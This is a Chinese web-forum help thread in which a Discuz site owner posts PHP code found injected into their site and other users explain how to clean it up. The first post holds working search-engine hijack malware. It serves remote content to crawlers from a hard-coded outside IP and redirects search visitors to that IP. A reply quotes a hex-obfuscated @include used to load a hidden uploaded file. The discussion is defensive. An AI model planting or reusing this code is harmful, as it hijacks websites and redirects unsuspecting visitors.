查看: 92|回复: 5

[讨论] 这一段是什么意思,网站异常卡,是被挂马了,怎么查找.....

[复制链接]

4

主题

5

回帖

0

积分

热心网友

金币
5
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2010-4-28
发表于 2020-9-11 13:44:14 | 显示全部楼层 |阅读模式
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://137.220.220.7/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;
}

$httpuser=strtolower($_SERVER['HTTP_REFERER']);
if(strstr($httpuser,'sogou') or strstr($httpuser,'baidu') or strstr($httpuser,'HaosouSpider') or strstr($httpuser,'YisouSpider'))

{

Header("Location: http://137.220.220.7/");//

exit;

}


怎么查找其他php文件也包含这个。。。铺天盖地的码

key, strtolower, strpos, false, SERVER
回复

使用道具 举报

0

主题

3

回帖

0

积分

热心网友

金币
3
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2011-11-6
发表于 2020-9-11 15:51:37 | 显示全部楼层
您这可能是被挂马了哦
回复

使用道具 举报

63

主题

383

回帖

0

积分

热心网友

金币
383
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2009-10-2
发表于 2020-9-11 16:13:14 | 显示全部楼层
看样子是木马,https://addon.dismall.com/plugins/nayuan_safe.html
回复

使用道具 举报

8

主题

188

回帖

0

积分

热心网友

金币
188
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2010-12-1
发表于 2020-9-12 04:37:28 | 显示全部楼层
若存在,处理前,先卸载所有盗版插件与模版。

进discuz后台找到工具-文件校验,看下最近有哪些php文件被修改了。

1、排查网站源文件的php 文件,查看是否有出现IP地址、或者异常网站(上面跳转的网站),如果有删除就可以了。

2、排查网站源文件的php 文件,查看是否有如下代码:@include($_SERVER['DOCUMENT_ROOT']

(排查一般用WEBshell后门扫描软件扫描核查!)

如果有就删除此段代码。并把该段代码进行解密。

举例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代码为:2F646174612F6176617461722F30

解密后为:/data/avatar/0

代码解密地址:http://www.bejson.com/convert/ox2str/


意思就是在上述路径下存在被非法上传的文件,用于做快照劫持。

解决办法:删除上面的代码和文件即可。

挂马问题解决了后,记得更改服务器相关的各种密码,尽量设置的复杂一点。
回复

使用道具 举报

0

主题

2

回帖

0

积分

热心网友

金币
2
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2011-2-19
发表于 2020-9-14 13:38:39 | 显示全部楼层
被挂马了。
回复

使用道具 举报

4

主题

1

回帖

0

积分

热心网友

金币
1
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2010-1-24
发表于 2020-9-18 21:42:33 | 显示全部楼层
这个是被挂马了,当搜索引擎访问页面后,自动跳转到目标网站或者ip,出现这种问题,一般就是服务器安全没做到位,或者使用了盗版插件造成的。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部